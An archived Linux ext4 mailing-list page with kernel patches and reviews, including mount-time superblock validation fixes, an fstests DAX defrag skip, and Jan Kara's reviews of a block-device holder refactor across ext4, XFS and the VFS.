Linux EXT4 FS development

* [PATCH v2 1/3] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08 11:11 UTC
  To: linux-ext4
  Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
	Sashiko
In-Reply-To: <20260608111150.827117-1-libaokun@linux.alibaba.com>

The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().

If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum.  Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.

Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.

Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
 fs/ext4/super.c | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3ddcb4a8d4db 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
 		sbi->s_cluster_bits = 0;
 	}
 	sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
-	if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+	if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_clusters_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
 			 sbi->s_clusters_per_group);
 		return -EINVAL;
 	}
@@ -5304,8 +5305,9 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
 		return -EINVAL;
 	}
 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
-	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
+	    sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_inodes_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu",
 			 sbi->s_inodes_per_group);
 		return -EINVAL;
 	}
-- 
2.43.7


* [PATCH v2 0/3] ext4: tighten mount-time superblock geometry validation
From: Baokun Li @ 2026-06-08 11:11 UTC
  To: linux-ext4; +Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list

Changes since v1:
 * Patch 1: Removed a spurious newline in the error message format string.
 * Added Patches 2 and 3 to fix additional issues reported by Sashiko
   (independent of Patch 1).

v1: https://patch.msgid.link/20260608061112.392391-1-libaokun@linux.alibaba.com

This series adds missing mount-time sanity checks for superblock
geometry parameters, preventing crafted filesystem images from causing
bitmap checksum corruption, integer overflow, or out-of-bounds inode
table access.

Patch 1 rejects filesystems where s_clusters_per_group or
s_inodes_per_group is not 8-aligned, since the bitmap checksum
functions operate on whole bytes and would leave trailing bits
unprotected.
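
As an illustration of the arithmetic behind Patch 1, here is a minimal
user-space sketch (not the kernel code).  The helper names are
hypothetical; only the ">> 3" length and the "& 7" test are taken from
the patch description.

```c
#include <errno.h>

/* Bytes covered when the checksum length is computed as bits >> 3. */
static unsigned long csum_bytes(unsigned long bits_per_group)
{
	return bits_per_group >> 3;
}

/* Trailing bitmap bits that fall outside the checksummed bytes. */
static unsigned long uncovered_bits(unsigned long bits_per_group)
{
	return bits_per_group & 7;
}

/*
 * Hypothetical stand-in for the mount-time validation: reject values
 * that exceed one bitmap block or are not a multiple of 8.
 */
static int check_per_group(unsigned long bits_per_group,
			   unsigned long blocksize)
{
	if (bits_per_group > blocksize * 8 || (bits_per_group & 7))
		return -EINVAL;
	return 0;
}
```

With 8189 bits per group and a 1024-byte block, the checksum would cover
1023 bytes and leave 5 bits uncovered, so the check rejects the value;
8192 is accepted.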

Patch 2 reduces EXT4_MAX_CLUSTER_LOG_SIZE from 30 to 28 to match
the documented 256MB limit in mke2fs, preventing a 32-bit overflow
in the blocks-per-group consistency check on bigalloc filesystems.
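
The overflow in Patch 2 can be sketched in user space as follows.  This
assumes the consistency check multiplies clusters per group by the
cluster-to-block ratio in 32-bit arithmetic; the exact kernel expression
is not quoted in this cover letter, and the function names are
hypothetical.

```c
#include <stdint.h>

/*
 * clusters_per_group * (cluster_size / block_size), computed in 32 bits.
 * Unsigned arithmetic wraps modulo 2^32 on overflow.
 */
static uint32_t blocks_per_group_32(uint32_t clusters_per_group,
				    unsigned int cluster_log,
				    unsigned int block_log)
{
	uint32_t ratio = (uint32_t)1 << (cluster_log - block_log);

	return clusters_per_group * ratio;
}

/* The same product computed in 64 bits, for comparison. */
static uint64_t blocks_per_group_64(uint32_t clusters_per_group,
				    unsigned int cluster_log,
				    unsigned int block_log)
{
	return (uint64_t)clusters_per_group << (cluster_log - block_log);
}
```

Clusters per group is bounded by blocksize * 8, so the largest product is
2^(cluster_log + 3).  With a cluster log size of 30 that is 2^33, which
wraps to 0 in 32 bits; with 28 it is 2^31, which still fits.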

Patch 3 rejects filesystems where s_inodes_per_group is not a
multiple of s_inodes_per_block, preventing truncation in the
s_itb_per_group calculation that could lead __ext4_get_inode_loc()
to read beyond the inode table.
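
The truncation addressed by Patch 3 can be modelled with the simplified
sketch below.  It is not the kernel's __ext4_get_inode_loc(); the helper
names are hypothetical and the lookup is reduced to integer division.

```c
/* Inode table blocks per group, truncated by integer division. */
static unsigned long itb_per_group(unsigned long inodes_per_group,
				   unsigned long inodes_per_block)
{
	return inodes_per_group / inodes_per_block;
}

/* Inode table block that holds the inode at a given index in its group. */
static unsigned long inode_table_block(unsigned long index_in_group,
				       unsigned long inodes_per_block)
{
	return index_in_group / inodes_per_block;
}

/* Returns 1 if the inode's block lies inside the computed table size. */
static int inode_in_table(unsigned long inodes_per_group,
			  unsigned long inodes_per_block,
			  unsigned long index_in_group)
{
	return inode_table_block(index_in_group, inodes_per_block) <
	       itb_per_group(inodes_per_group, inodes_per_block);
}
```

With 24 inodes per group and 16 inodes per block, the table size
truncates to 1 block, yet the inode at index 23 maps to block 1, which is
past the end of the table.  Note that 24 is 8-aligned, so Patch 1 alone
would not reject this geometry.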

Baokun Li (3):
  ext4: reject mount if clusters/inodes per group are not 8-aligned
  ext4: reduce max cluster size to match documented 256MB limit
  ext4: reject mount if inodes per group is not a multiple of inodes per
    block

 fs/ext4/ext4.h  |  2 +-
 fs/ext4/super.c | 11 +++++++----
 2 files changed, 8 insertions(+), 5 deletions(-)

-- 
2.43.7

* [PATCH v3] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-08 10:23 UTC
  To: fstests
  Cc: linux-ext4, linux-fsdevel, linux-xfs, ritesh.list, ojaswin,
	djwong, Disha Goel

Online defragmentation is not supported on ext4 DAX-enabled filesystems.
The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
on DAX files.

Add an ext4-specific check in _require_defrag() to skip tests when DAX
is enabled, avoiding false failures on ext4/301-304, ext4/308, and
generic/018.

XFS defrag works with DAX, so this check is ext4-specific.

Suggested-by: Darrick J. Wong <djwong@kernel.org>
Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
---
Changes in v3:
- Move the DAX check inside the ext4 case statement as
  suggested by Darrick

 common/defrag | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/common/defrag b/common/defrag
index 055d0d0e..baf05d94 100644
--- a/common/defrag
+++ b/common/defrag
@@ -13,6 +13,8 @@ _require_defrag()
         DEFRAG_PROG="$XFS_FSR_PROG"
 	;;
     ext4)
+        __scratch_uses_fsdax && _notrun "ext4 online defrag not supported with DAX"
+
 	testfile="$TEST_DIR/$$-test.defrag"
 	donorfile="$TEST_DIR/$$-donor.defrag"
 	bsize=`_get_block_size $TEST_DIR`
-- 
2.45.1


* Re: [PATCH RFC 8/8] super: make fs_holder_ops private
From: Jan Kara @ 2026-06-08 10:18 UTC
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-8-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:14, Christian Brauner wrote:
> There's no need to expose it anymore.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  fs/super.c | 3 +--
>  1 file changed, 1 insertion(+), 2 deletions(-)
> 
> diff --git a/fs/super.c b/fs/super.c
> index cea743f699e4..983c2fbf5202 100644
> --- a/fs/super.c
> +++ b/fs/super.c
> @@ -1643,13 +1643,12 @@ static int fs_bdev_thaw(struct block_device *bdev)
>  	return error;
>  }
>  
> -const struct blk_holder_ops fs_holder_ops = {
> +static const struct blk_holder_ops fs_holder_ops = {
>  	.mark_dead		= fs_bdev_mark_dead,
>  	.sync			= fs_bdev_sync,
>  	.freeze			= fs_bdev_freeze,
>  	.thaw			= fs_bdev_thaw,
>  };
> -EXPORT_SYMBOL_GPL(fs_holder_ops);
>  
>  static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
>  {
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

* Re: [PATCH RFC 6/8] ext4: open via dedicated fs bdev helpers
From: Jan Kara @ 2026-06-08 10:18 UTC
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-6-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:12, Christian Brauner wrote:
> Route opens through fs_bdev_file_open_by_path() so each external device
> is registered against the correct superblock, and convert the matching
> releases.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  fs/ext4/super.c | 12 ++++++------
>  1 file changed, 6 insertions(+), 6 deletions(-)
> 
> diff --git a/fs/ext4/super.c b/fs/ext4/super.c
> index 6a77db4d3124..8108d999008e 100644
> --- a/fs/ext4/super.c
> +++ b/fs/ext4/super.c
> @@ -5793,7 +5793,7 @@ failed_mount8: __maybe_unused
>  	brelse(sbi->s_sbh);
>  	if (sbi->s_journal_bdev_file) {
>  		invalidate_bdev(file_bdev(sbi->s_journal_bdev_file));
> -		bdev_fput(sbi->s_journal_bdev_file);
> +		fs_bdev_file_release(sbi->s_journal_bdev_file, sb);
>  	}
>  out_fail:
>  	invalidate_bdev(sb->s_bdev);
> @@ -5972,9 +5972,9 @@ static struct file *ext4_get_journal_blkdev(struct super_block *sb,
>  	struct ext4_super_block *es;
>  	int errno;
>  
> -	bdev_file = bdev_file_open_by_dev(j_dev,
> +	bdev_file = fs_bdev_file_open_by_dev(j_dev,
>  		BLK_OPEN_READ | BLK_OPEN_WRITE | BLK_OPEN_RESTRICT_WRITES,
> -		sb, &fs_holder_ops);
> +		sb, sb);
>  	if (IS_ERR(bdev_file)) {
>  		ext4_msg(sb, KERN_ERR,
>  			 "failed to open journal device unknown-block(%u,%u) %ld",
> @@ -6034,7 +6034,7 @@ static struct file *ext4_get_journal_blkdev(struct super_block *sb,
>  out_bh:
>  	brelse(bh);
>  out_bdev:
> -	bdev_fput(bdev_file);
> +	fs_bdev_file_release(bdev_file, sb);
>  	return ERR_PTR(errno);
>  }
>  
> @@ -6073,7 +6073,7 @@ static journal_t *ext4_open_dev_journal(struct super_block *sb,
>  out_journal:
>  	ext4_journal_destroy(EXT4_SB(sb), journal);
>  out_bdev:
> -	bdev_fput(bdev_file);
> +	fs_bdev_file_release(bdev_file, sb);
>  	return ERR_PTR(errno);
>  }
>  
> @@ -7492,7 +7492,7 @@ static void ext4_kill_sb(struct super_block *sb)
>  	kill_block_super(sb);
>  
>  	if (bdev_file)
> -		bdev_fput(bdev_file);
> +		fs_bdev_file_release(bdev_file, sb);
>  }
>  
>  static struct file_system_type ext4_fs_type = {
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

* Re: [PATCH RFC 4/8] xfs: port to fs_bdev_file_open_by_path()
From: Jan Kara @ 2026-06-08 10:15 UTC
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-4-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:10, Christian Brauner wrote:
> Route opens through fs_bdev_file_open_by_path() so each external device
> is registered against mp->m_super, and convert the matching releases.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  fs/xfs/xfs_buf.c   |  2 +-
>  fs/xfs/xfs_super.c | 10 +++++-----
>  2 files changed, 6 insertions(+), 6 deletions(-)
> 
> diff --git a/fs/xfs/xfs_buf.c b/fs/xfs/xfs_buf.c
> index 580d40a5ee57..3d3b29edb156 100644
> --- a/fs/xfs/xfs_buf.c
> +++ b/fs/xfs/xfs_buf.c
> @@ -1601,7 +1601,7 @@ xfs_free_buftarg(
>  	fs_put_dax(btp->bt_daxdev, btp->bt_mount);
>  	/* the main block device is closed by kill_block_super */
>  	if (btp->bt_bdev != btp->bt_mount->m_super->s_bdev)
> -		bdev_fput(btp->bt_file);
> +		fs_bdev_file_release(btp->bt_file, btp->bt_mount->m_super);
>  	kfree(btp);
>  }
>  
> diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
> index f8de44443e81..304667210695 100644
> --- a/fs/xfs/xfs_super.c
> +++ b/fs/xfs/xfs_super.c
> @@ -400,8 +400,8 @@ xfs_blkdev_get(
>  	blk_mode_t		mode;
>  
>  	mode = sb_open_mode(mp->m_super->s_flags);
> -	*bdev_filep = bdev_file_open_by_path(name, mode,
> -			mp->m_super, &fs_holder_ops);
> +	*bdev_filep = fs_bdev_file_open_by_path(name, mode,
> +			mp->m_super, mp->m_super);
>  	if (IS_ERR(*bdev_filep)) {
>  		error = PTR_ERR(*bdev_filep);
>  		*bdev_filep = NULL;
> @@ -526,7 +526,7 @@ xfs_open_devices(
>  		mp->m_logdev_targp = mp->m_ddev_targp;
>  		/* Handle won't be used, drop it */
>  		if (logdev_file)
> -			bdev_fput(logdev_file);
> +			fs_bdev_file_release(logdev_file, mp->m_super);
>  	}
>  
>  	return 0;
> @@ -538,10 +538,10 @@ xfs_open_devices(
>  	xfs_free_buftarg(mp->m_ddev_targp);
>   out_close_rtdev:
>  	 if (rtdev_file)
> -		bdev_fput(rtdev_file);
> +		fs_bdev_file_release(rtdev_file, mp->m_super);
>   out_close_logdev:
>  	if (logdev_file)
> -		bdev_fput(logdev_file);
> +		fs_bdev_file_release(logdev_file, mp->m_super);
>  	return error;
>  }
>  
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

* Re: [PATCH RFC 2/8] fs: add a global device to super block hash table
From: Jan Kara @ 2026-06-08 10:14 UTC
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-2-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:08, Christian Brauner wrote:
> fs_holder_ops recovers the owning superblock from bdev->bd_holder, which
> forces the holder to be exactly one superblock and prevents several
> superblocks from sharing one block device. That's what erofs is doing.
> 
> Introduce a global dev_t-keyed rhltable mapping each block device to the
> superblock(s) using it. The holder argument becomes purely the block
> layer's exclusivity token (a superblock, or a file_system_type for
> shared devices) and is no longer needed by the fs specific callbacks.
> 
> Registration keeps one entry per (device, superblock). When a filesystem
> claims a device it already uses (xfs with its log on the data device), no
> second entry is added, so each superblock is acted on once.
> 
> Each table entry holds a passive reference (s_count) on its superblock,
> so the struct stays valid for as long as the entry is reachable. The
> callbacks look the device up in the table and act on every superblock
> using it:
> 
> Unlinking an entry is deferred to the last unpin, so a cursor never
> resumes from a removed node. After this it's possible to act on all
> superblocks that share a given device.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good! One comment below:

>  static void fs_bdev_mark_dead(struct block_device *bdev, bool surprise)
>  {
> -	struct super_block *sb;
> +	struct fs_bdev_holder *h;
> +	dev_t dev = bdev->bd_dev;
>  
> -	sb = bdev_super_lock(bdev, false);
> -	if (!sb)
> -		return;
> +	mutex_unlock(&bdev->bd_holder_lock);

The moment we drop bd_holder_lock, there's nothing which prevents the bdev
owner from changing. So this can lead to a situation where we miss calling
->mark_dead callback of the new holder. Similarly for all the other holder
ops. I didn't find a situation where it would actually matter so I think
we're fine but it's a potential catch. Anyway, feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

>  
> -	if (sb->s_op->remove_bdev) {
> -		int ret;
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		struct super_block *sb = h->sb;
>  
> -		ret = sb->s_op->remove_bdev(sb, bdev);
> -		if (!ret) {
> -			super_unlock_shared(sb);
> -			return;
> +		if (!super_lock_shared(sb))
> +			continue;
> +		if (sb->s_root && (sb->s_flags & SB_ACTIVE)) {
> +			if (!sb->s_op->remove_bdev ||
> +			    sb->s_op->remove_bdev(sb, bdev)) {
> +				if (!surprise)
> +					sync_filesystem(sb);
> +				shrink_dcache_sb(sb);
> +				evict_inodes(sb);
> +				if (sb->s_op->shutdown)
> +					sb->s_op->shutdown(sb);
> +			}
>  		}
> -		/* Fallback to shutdown. */
> +		super_unlock_shared(sb);
>  	}
> -
> -	if (!surprise)
> -		sync_filesystem(sb);
> -	shrink_dcache_sb(sb);
> -	evict_inodes(sb);
> -	if (sb->s_op->shutdown)
> -		sb->s_op->shutdown(sb);
> -
> -	super_unlock_shared(sb);
>  }
>  
>  static void fs_bdev_sync(struct block_device *bdev)
>  {
> -	struct super_block *sb;
> +	struct fs_bdev_holder *h;
> +	dev_t dev = bdev->bd_dev;
>  
> -	sb = bdev_super_lock(bdev, false);
> -	if (!sb)
> -		return;
> +	mutex_unlock(&bdev->bd_holder_lock);
>  
> -	sync_filesystem(sb);
> -	super_unlock_shared(sb);
> -}
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		struct super_block *sb = h->sb;
>  
> -static struct super_block *get_bdev_super(struct block_device *bdev)
> -{
> -	bool active = false;
> -	struct super_block *sb;
> -
> -	sb = bdev_super_lock(bdev, true);
> -	if (sb) {
> -		active = atomic_inc_not_zero(&sb->s_active);
> -		super_unlock_excl(sb);
> +		if (!super_lock_shared(sb))
> +			continue;
> +		if (sb->s_root && (sb->s_flags & SB_ACTIVE))
> +			sync_filesystem(sb);
> +		super_unlock_shared(sb);
>  	}
> -	if (!active)
> -		return NULL;
> -	return sb;
>  }
>  
>  /**
> - * fs_bdev_freeze - freeze owning filesystem of block device
> + * fs_bdev_freeze - freeze every superblock using a block device
>   * @bdev: block device
>   *
> - * Freeze the filesystem that owns this block device if it is still
> - * active.
> - *
> - * A filesystem that owns multiple block devices may be frozen from each
> - * block device and won't be unfrozen until all block devices are
> - * unfrozen. Each block device can only freeze the filesystem once as we
> - * nest freezes for block devices in the block layer.
> + * Freeze each live superblock using @bdev.  A superblock owning several block
> + * devices is frozen once per device and stays frozen until all are thawed; the
> + * block layer nests these freezes so the count stays balanced.
>   *
> - * Return: If the freeze was successful zero is returned. If the freeze
> - *         failed a negative error code is returned.
> + * Return: 0, or the error from the one superblock on a single-fs device.  When
> + *         several superblocks share @bdev a per-superblock failure is swallowed
> + *         (see below), but a sync_blockdev() failure is always reported.
>   */
>  static int fs_bdev_freeze(struct block_device *bdev)
>  {
> -	struct super_block *sb;
> -	int error = 0;
> +	dev_t dev = bdev->bd_dev;
> +	struct fs_bdev_holder *h;
> +	unsigned int count = 0;
> +	int error = 0, err;
>  
>  	lockdep_assert_held(&bdev->bd_fsfreeze_mutex);
>  
> -	sb = get_bdev_super(bdev);
> -	if (!sb)
> -		return -EINVAL;
> +	mutex_unlock(&bdev->bd_holder_lock);
>  
> -	if (sb->s_op->freeze_super)
> -		error = sb->s_op->freeze_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> -	else
> -		error = freeze_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		if (!atomic_inc_not_zero(&h->sb->s_active))
> +			continue;
> +		err = fs_super_freeze(h->sb);
> +		if (err && !error)
> +			error = err;
> +		deactivate_super(h->sb);
> +		count++;
> +	}
> +
> +	/*
> +	 * When several superblocks share the device, keep it frozen even if some
> +	 * of them failed to freeze and swallow the error: rolling the rest back
> +	 * via thaw_super() can fail too, so neither is a clear win. A single
> +	 * filesystem (count == 1) still reports its error.
> +	 */
> +	if (error && count > 1)
> +		error = 0;
>  	if (!error)
>  		error = sync_blockdev(bdev);
> -	deactivate_super(sb);
>  	return error;
>  }
>  
>  /**
> - * fs_bdev_thaw - thaw owning filesystem of block device
> + * fs_bdev_thaw - thaw every superblock using a block device
>   * @bdev: block device
>   *
> - * Thaw the filesystem that owns this block device.
> + * The counterpart to fs_bdev_freeze(): thaw each live superblock using @bdev.
> + * A zero return does not imply a superblock is fully unfrozen; it may have been
> + * frozen more than once (by the kernel or via another device).
>   *
> - * A filesystem that owns multiple block devices may be frozen from each
> - * block device and won't be unfrozen until all block devices are
> - * unfrozen. Each block device can only freeze the filesystem once as we
> - * nest freezes for block devices in the block layer.
> - *
> - * Return: If the thaw was successful zero is returned. If the thaw
> - *         failed a negative error code is returned. If this function
> - *         returns zero it doesn't mean that the filesystem is unfrozen
> - *         as it may have been frozen multiple times (kernel may hold a
> - *         freeze or might be frozen from other block devices).
> + * Return: 0, or the first error on a single-fs device; a shared device swallows
> + *         per-superblock errors, as fs_bdev_freeze() does.
>   */
>  static int fs_bdev_thaw(struct block_device *bdev)
>  {
> -	struct super_block *sb;
> -	int error;
> +	dev_t dev = bdev->bd_dev;
> +	struct fs_bdev_holder *h;
> +	unsigned int count = 0;
> +	int error = 0, err;
>  
>  	lockdep_assert_held(&bdev->bd_fsfreeze_mutex);
>  
> -	/*
> -	 * The block device may have been frozen before it was claimed by a
> -	 * filesystem. Concurrently another process might try to mount that
> -	 * frozen block device and has temporarily claimed the block device for
> -	 * that purpose causing a concurrent fs_bdev_thaw() to end up here. The
> -	 * mounter is already about to abort mounting because they still saw an
> -	 * elevanted bdev->bd_fsfreeze_count so get_bdev_super() will return
> -	 * NULL in that case.
> -	 */
> -	sb = get_bdev_super(bdev);
> -	if (!sb)
> -		return -EINVAL;
> +	mutex_unlock(&bdev->bd_holder_lock);
>  
> -	if (sb->s_op->thaw_super)
> -		error = sb->s_op->thaw_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> -	else
> -		error = thaw_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> -	deactivate_super(sb);
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		if (!atomic_inc_not_zero(&h->sb->s_active))
> +			continue;
> +		err = fs_super_thaw(h->sb);
> +		if (err && !error)
> +			error = err;
> +		deactivate_super(h->sb);
> +		count++;
> +	}
> +
> +	/* Shared device: swallow per-superblock errors, like fs_bdev_freeze(). */
> +	if (error && count > 1)
> +		error = 0;
>  	return error;
>  }
>  
> @@ -1602,6 +1651,131 @@ const struct blk_holder_ops fs_holder_ops = {
>  };
>  EXPORT_SYMBOL_GPL(fs_holder_ops);
>  
> +static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
> +{
> +	dev_t dev = file_bdev(bdev_file)->bd_dev;
> +	struct rhlist_head *list, *pos;
> +	struct fs_bdev_holder *h;
> +	int err;
> +
> +	/*
> +	 * A superblock may claim one device more than once (xfs with its log on
> +	 * the data device).  Keep a single entry per (device, superblock) and
> +	 * count the claims in @fs_bdev_active; the entry lives until the last one
> +	 * is released.
> +	 */
> +	scoped_guard(rcu) {
> +		list = rhltable_lookup(&fs_bdev_supers, &dev, fs_bdev_params);
> +		rhl_for_each_entry_rcu(h, pos, list, node)
> +			if (h->sb == sb && refcount_inc_not_zero(&h->fs_bdev_active))
> +				return 0;
> +	}
> +
> +	h = kmalloc(sizeof(*h), GFP_KERNEL);
> +	if (!h)
> +		return -ENOMEM;
> +	h->dev = dev;
> +	h->sb = sb;
> +	refcount_set(&h->fs_bdev_passive, 1);
> +	refcount_set(&h->fs_bdev_active, 1);
> +
> +	err = rhltable_insert(&fs_bdev_supers, &h->node, fs_bdev_params);
> +	if (err) {
> +		kfree(h);
> +		return err;
> +	}
> +
> +	/* The sb->s_count ref keeps @h->sb valid for as long as the entry exists. */
> +	spin_lock(&sb_lock);
> +	sb->s_count++;
> +	spin_unlock(&sb_lock);
> +
> +	return 0;
> +}
> +
> +/**
> + * fs_bdev_file_open_by_dev - claim a block device on behalf of a superblock
> + * @dev: block device number
> + * @mode: open mode
> + * @holder: block-layer exclusivity token (a superblock, or the file_system_type
> + *          when the device may be shared by several superblocks of that type)
> + * @sb: superblock to drive fs_holder_ops events for
> + *
> + * Open @dev with &fs_holder_ops and register that @sb uses it, so device
> + * removal/sync/freeze/thaw are propagated to @sb (and any other superblock
> + * sharing @dev).  Must be paired with fs_bdev_file_release().
> + *
> + * Return: an opened block-device file or an ERR_PTR().
> + */
> +struct file *fs_bdev_file_open_by_dev(dev_t dev, blk_mode_t mode, void *holder,
> +				      struct super_block *sb)
> +{
> +	struct file *bdev_file;
> +	int err;
> +
> +	bdev_file = bdev_file_open_by_dev(dev, mode, holder, &fs_holder_ops);
> +	if (IS_ERR(bdev_file))
> +		return bdev_file;
> +
> +	err = fs_bdev_register(bdev_file, sb);
> +	if (err) {
> +		bdev_fput(bdev_file);
> +		return ERR_PTR(err);
> +	}
> +	return bdev_file;
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_open_by_dev);
> +
> +struct file *fs_bdev_file_open_by_path(const char *path, blk_mode_t mode,
> +				       void *holder, struct super_block *sb)
> +{
> +	struct file *bdev_file;
> +	int err;
> +
> +	bdev_file = bdev_file_open_by_path(path, mode, holder, &fs_holder_ops);
> +	if (IS_ERR(bdev_file))
> +		return bdev_file;
> +
> +	err = fs_bdev_register(bdev_file, sb);
> +	if (err) {
> +		bdev_fput(bdev_file);
> +		return ERR_PTR(err);
> +	}
> +	return bdev_file;
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_open_by_path);
> +
> +/**
> + * fs_bdev_file_release - release a block device claimed for a superblock
> + * @bdev_file: file returned by fs_bdev_file_open_by_{dev,path}()
> + * @sb: superblock the device was claimed for
> + *
> + * Drop one claim on the {dev, @sb} entry; the last claim unregisters it (a
> + * pinning cursor defers the actual unlink).  Then close the block device.
> + */
> +void fs_bdev_file_release(struct file *bdev_file, struct super_block *sb)
> +{
> +	dev_t dev = file_bdev(bdev_file)->bd_dev;
> +	struct fs_bdev_holder *h, *found = NULL;
> +	struct rhlist_head *list, *pos;
> +
> +	rcu_read_lock();
> +	list = rhltable_lookup(&fs_bdev_supers, &dev, fs_bdev_params);
> +	rhl_for_each_entry_rcu(h, pos, list, node) {
> +		if (h->sb != sb)
> +			continue;
> +		/* At most one entry per (dev, sb); the last claim drops the bias. */
> +		if (refcount_dec_and_test(&h->fs_bdev_active))
> +			found = h;
> +		break;
> +	}
> +	rcu_read_unlock();
> +	if (found)
> +		fs_bdev_holder_put(found);
> +	bdev_fput(bdev_file);
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_release);
> +
>  int setup_bdev_super(struct super_block *sb, int sb_flags,
>  		struct fs_context *fc)
>  {
> @@ -1609,7 +1783,7 @@ int setup_bdev_super(struct super_block *sb, int sb_flags,
>  	struct file *bdev_file;
>  	struct block_device *bdev;
>  
> -	bdev_file = bdev_file_open_by_dev(sb->s_dev, mode, sb, &fs_holder_ops);
> +	bdev_file = fs_bdev_file_open_by_dev(sb->s_dev, mode, sb, sb);
>  	if (IS_ERR(bdev_file)) {
>  		if (fc)
>  			errorf(fc, "%s: Can't open blockdev", fc->source);
> @@ -1623,7 +1797,7 @@ int setup_bdev_super(struct super_block *sb, int sb_flags,
>  	 * writable from userspace even for a read-only block device.
>  	 */
